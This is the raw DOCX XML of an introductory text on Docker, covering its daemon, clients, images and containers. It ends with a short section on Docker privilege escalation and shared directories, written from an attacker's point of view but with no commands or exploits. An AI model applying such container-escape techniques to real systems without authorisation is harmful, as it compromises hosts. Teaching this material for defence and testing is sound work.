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7FB1" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B336671" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="310E06B7">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEDDF48"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Docker is a popular open-source tool that provides a portable and consistent runtime environment for software applications. It uses containers as isolated environments in user space that run at the operating system level and share the file system and system resources. One advantage is that containerization thus consumes significantly fewer resources than a traditional server or virtual machine. The core feature of Docker is that applications are encapsulated in so-called Docker containers. They can thus be used for any operating system. A Docker container represents a lightweight standalone executable software package that contains everything needed to run an application code runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099BAC05" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="0224712D">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3422EDA5" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B03A4C4"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At the core of the Docker architecture lies a client-server model, where we have two primary components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D4B42B" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="000920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The Docker daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C109B9B" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="000920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The Docker client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442E55CF"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The Docker client acts as our interface for issuing commands and interacting with the Docker ecosystem, while the Docker daemon is responsible for executing those commands and managing containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409ED17F" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D7D32C"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Daemon</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, also known as the Docker server, is a critical part of the Docker platform that plays a pivotal role in container management and orchestration. Think of the Docker Daemon as the powerhouse behind Docker. It has several essential responsibilities like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD1741" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="000920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running Docker containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6001CB0A" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="000920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interacting with Docker containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD721D7" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="000920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managing Docker containers on the host system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B39FB77" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Managing Docker Containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A70CD36"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Firstly, it handles the core containerization functionality. It coordinates the creation, execution, and monitoring of Docker containers, maintaining their isolation from the host and other containers. This isolation ensures that containers operate independently, with their own file systems, processes, and network interfaces. Furthermore, it handles Docker image management. It pulls images from registries, such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00092071">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Docker Hub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or private repositories, and stores them locally. These images serve as the building blocks for creating containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147D6750"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Additionally, the Docker Daemon offers monitoring and logging capabilities, for example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1219C" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="0009207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lastRenderedPageBreak/>
        <w:t>Captures container logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A32455" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="0009207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Provides insight into container activities, errors, and debugging information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B58F5E"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The Daemon also monitors resource utilization, such as CPU, memory, and network usage, allowing us to optimize container performance and troubleshoot issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B49F5B8" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Network and Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F647541"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It facilitates container networking by creating virtual networks and managing network interfaces. It enables containers to communicate with each other and the outside world through network ports, IP addresses, and DNS resolution. The Docker Daemon also plays a critical role in storage management, since it handles Docker volumes, which are used to persist data beyond the lifespan of containers and manages volume creation, attachment, and clean-up, allowing containers to share or store data independently of each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2F72F" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301A53B"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When we interact with Docker, we issue commands through the </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, which communicates with the Docker Daemon (through a </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RESTful API</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Unix socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>) and serves as our primary means of interacting with Docker. We also have the ability to create, start, stop, manage, remove containers, search, and download Docker images. With these options, we can pull existing images to use as a base for our containers or build our custom images using Dockerfiles. We have the flexibility to push our images to remote repositories, facilitating collaboration and sharing within our teams or with the wider community.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512CBCA6"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In comparison, the Daemon, on the other hand, carries out the requested actions, ensuring containers are created, launched, stopped, and removed as required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4DFB94"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Another client for Docker is </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Compose</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is a tool that simplifies the orchestration of multiple Docker containers as a single application. It allows us to define our application's multi-container architecture using a declarative </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>YAML</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.yaml</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>) file. With it, we can specify the services comprising our application, their dependencies, and their configurations. We define container images, environment variables, networking, volume bindings, and other settings. Docker Compose then ensures that all the defined containers are launched and interconnected, creating a cohesive and scalable application stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B93D5A" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B735E57"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is available for MacOS, Windows, and Linux operating systems and provides us with a user-friendly GUI that simplifies the management of containers and their components. This allows us to monitor the status of our containers, inspect logs, and manage the resources allocated to Docker. It provides an intuitive and visual way to interact with the Docker ecosystem, making it accessible to developers of all levels of expertise, and additionally, it supports Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F715BB" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="4B1684E4">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="690996E0" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Images and Containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEDF79A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Think of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker image</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a blueprint or a template for creating containers. It encapsulates everything needed to run an application, including the application's code, dependencies, libraries, and configurations. An image is a self-contained, read-only package that ensures consistency and reproducibility across different environments. We can create images using a text file called a </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, which defines the steps and instructions for building the image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57409BD2"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker container</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an instance of a Docker image. It is a lightweight, isolated, and executable environment that runs applications. When we launch a container, it is created from a specific image, and the container inherits all the properties and configurations defined in that image. Each container operates independently, with its own filesystem, processes, and network interfaces. This isolation ensures that applications within containers remain separate from the underlying host system and other containers, preventing conflicts and interference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A6AF10"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While </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> are immutable and </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>read-only</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> are mutable and </w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>can be modified</w:t>
      </w:r>
      <w:r w:rsidRPr="00092071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> during runtime. We can interact with containers, execute commands within them, monitor their logs, and even make changes to their filesystem or environment. However, any modifications made to a container's filesystem are not persisted unless explicitly saved as a new image or stored in a persistent volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996E89A" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="39F50BDA">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D665C72" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF56EF6"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What can happen is that we get access to an environment where we will find users who can manage docker containers. With this, we could look for ways how to use those docker containers to obtain higher privileges on the target system. We can use several ways and techniques to escalate our privileges or escape the docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AE9C45" w14:textId="77777777" w:rsidR="00092071" w:rsidRPr="00092071" w:rsidRDefault="00092071" w:rsidP="00092071">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92071">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Docker Shared Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ADF927"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When using Docker, shared directories (volume mounts) can bridge the gap between the host system and the container's filesystem. With shared directories, specific directories or files on the host system can be made accessible within the container. This is incredibly useful for persisting data, sharing code, and facilitating collaboration between development environments and Docker containers. However, it always depends on the setup of the environment and the goals that administrators want to achieve. To create a shared directory, a path on the host system and a corresponding path within the container is specified, creating a direct link between the two locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C3132"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Shared directories offer several advantages, including the ability to persist data beyond the lifespan of a container, simplify code sharing and development, and enable collaboration within teams. It's important to note that shared directories can be mounted as read-only or read-write, depending on specific administrator requirements. When mounted as read-only, modifications made within the container won't affect the host system, which is useful when read-only access is preferred to prevent accidental modifications.</w:t>
      </w:r>
    </w:p>
